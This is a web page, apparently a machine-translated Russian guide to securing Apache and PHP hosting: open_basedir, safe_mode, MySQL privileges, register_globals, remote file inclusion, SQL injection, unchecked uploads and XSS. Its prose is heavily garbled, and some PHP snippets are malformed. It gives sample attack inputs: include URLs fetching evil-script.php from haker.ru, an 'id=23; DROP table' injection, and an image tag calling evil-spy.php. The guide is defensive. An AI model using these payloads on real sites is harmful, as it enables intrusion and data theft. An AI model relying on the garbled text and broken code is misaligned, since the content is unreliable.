(044) 362 48 16 (098) 294 41 60
|
|
|
Installing the server
Multihostvaya server configuration Just say that PHP and Apache in this area is far from gone. Normal multi-configuration Web Server to run under different users. Ie each userhas its own account in the system, login below it via FTP, upload files to the rights of 0700, and only he can operate with their files on a Web server. For this to take suExec, which, unfortunately, not podderzhyvaetsya APACHE when running PHP as a module. This nastroyka valid only for CGI.
There are several different solutions to this problem:
- Customize hitromudruyu system users / groups, the essence of which is always to ensure that all users belong to one group, under which the user running Apache. For example, there is a group "www "which includes the user" nobody "," pupkin "," jsmith ". In httpd.conf directive is
... <br> <b> User </ b> nobody <br> <b> Group </ b> www <br> ...
Semiconductors and configuredthat users put the files with the rights 640. If they want to edit files, not only for FTP and via a script, they put the right 0660.
In any case, the system allows a user to read the contents of files from other users, and sometimes (law 0660), even change them.
- The same system, but included with safe_mode = On. Reliable, but glyuchnaya configuration. If a week pupkin users jsmith and not zaklyuyut root user this means that they do not use the functions work with files. But if they intended to add to your site something like temperchki files - the server admin does not get better on the eyes. And all because of the fact that this Directive is incompatible with the mechanism suExec Apache. When working with files, it checks the same whether the owner of the file / directory with Apache plzovatelem. And because user nobody (Apache) and pupkin (user files) quitem different - from Pupkina nothing will come when trying to move_uploaded_file (), fopen (), gzopen () etc.
- The same system, but included open_basedir =. The most frequent way. Configuration restricts what files can be opened with the help of PHP to the specified site derEva directory. Employment Directive does not depends on whether the directive safe_mode. When the script tries to open the file, for example, via fopen or gzopen, checked the file path. If the file is outside the specified tree will be issued a warning and the option will not work. Symlink'i also opentsya. The special value. indicates that the directory from which you run the script will be the base. To specify multiple values, they need to divide the colon (under the Wind - the semicolon). As an Apache module, open_basedir paths from parent directories are now automatically inherited. <br />
Value open_basedir is actually - a prefix, not the name of the directory. This means that "open_basedir = / dir / incl" also allows access to "/ dir / include" and "/ dir / incls" if they exist. If you want to restrict access to certain directories - SpecifyITUs with her quote at the end: "open_basedir = / dir / incl /"
- Run multiple web servers with different users. It is not a good solution that will put them on different ports, which is inconvenient. By the same 3-5 servers, probably even a good tormoznut iron.
- IfYou do not care at all where the prevention of type
Do not use Apache 2.0 and PHP in a production environment neither on Unix nor on Windows. you can put the module MPM (Multi Processing Module), which is included in Apach2. Running Apache with the module "mpm_perchild_module "You can run virtual hosts with different yuzveryami, which IMHO is the best option, especially in combination with safe_mode = On.
Setting up database For each project, create a database user who has rights onlyOn its database. For example, the site of Mr. Pupkina in the MySQL database should receive the record:
<b> INSERT INTO user </ b> ( 'Host', 'User', 'Password', 'Select_priv', 'Insert_priv', 'Update_priv', 'Delete_priv', 'Create_priv', 'Drop_priv', 'Reload_priv' , 'Shutdown_priv ',' Process_priv ',' File_priv ',' Grant_priv ',' References_priv ',' Index_priv ',' Alter_priv ') <br> <b> VALUES </ b> (<br> 'localhost', 'pupkin', 's0ac67a5', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N ',' N ',' N ',' N ',' N '<br> ); <br> <br>
Think seven times before they both give the right of '%' and not on 'localhost' and never, under any pretext do not do this for userslei to the rights of 'root'.
REGISTER_GLOBALS Very important setting, which vlyaiet not only on proizvoditeolnost, but first and foremost, the security of scripts. The point is that when register_globals = On all variables from EGPCS (environment, get, post, cookie, session) will be available as normal variables, and if there are two variables with the same name, the value will be taken from one to the left in this sequence: EGPCS. This setting can be changed in php.ini. A typical example - the falsification of the data session through the GPC, for example - breaking avtorizatsii.
Includes parse input URLs into variables It is very bad approach to programming to do in this example:
index.php? showpage = news.php
<? php $ page = $ _GET [ 'showpage']; include ($ page); > At best, the challengePages index.php? showpage = bla_bla.php error and show some data servers to the worst - read files passwords etc. and the possibility of a hacker to run your scripts in your virtual host, with all its consequences. The latest threat lies in that the hacker can run a remote file blackEU
index.php? showpage = ftp://ftp.haker.ru/evil-script.php
or
index.php? showpage = http://haker.ru/evil-script.php
(Of course, evil-script.php file should not be parsed server haker.ru, a content issue as it is)
Neproverkafile types when injected If you allow users to upload certain files (eg photos, files) on a file system server and do not check their expansion, the vernyak - you haknut. It will be sufficient to upload your script with the extension *. php and then start itas you can get access to the entire infe website, scripts, database and edit the contents.
How to check to see here
Neproverka the user's input All that is introduced through the GET-POST-COOKIE bindingbut should be checked, result in the smallest type, because no one prevents the user poredaktirovat POST-form, add in URLu something, poredaktirovat Cook or, in general, send your request teleports, in general - to send you Troyanska pig
The most common purpose of such attacks - SQL requests that are made up of a user's query. In this example:
file.php? id = 23
<? php $ res = mysql_query ( "SELECT * FROM table WHERE id =".$_ GET [ 'id']); > nothing prevents the user to add anything KROIU? id = 23 or provoking an error. For example
index.php? id = 23; DROP table
Delete table and another, depending on user rights, can be a lot of things make balls.
Always leads to the smallest types of variables:
index.php? id = 23; DROPtable
<? php $ id = (int) $ _GET [ 'id']; if ($ id <1) ( die ( 'No ID specified'); ) $ res = mysql_query ( "SELECT * FROM table WHERE id =". $ id); > output that was expected.
If the data must be string --You can check them further. This may be the length (maximum, minimum, empty string), the presence of illegal characters (latin, numbers, Cyrillic), correctness URLov, addresses, e-mail.
Loaded URLy Pass through the FDA minimum information: <b> http://www.example.com/showuser.php?name=Pupkin&dept=13&cat=employee&show=full </ b> <br> will be so much better <br> <b> http://www.example.com/showuser.php?id=176 </ b>
Use of visitorsitelyami HTML If you give your visitors to enter any data, which then will be shown on this page (NA message forum, chat, news, summaries etc.) Always do on the user's input htmlencode () before the issue of its on-mountain. And they always cram there areor <img src="http://haker.ru/evil-spy.php"> or <iframe src=c:> </ iframe> |
|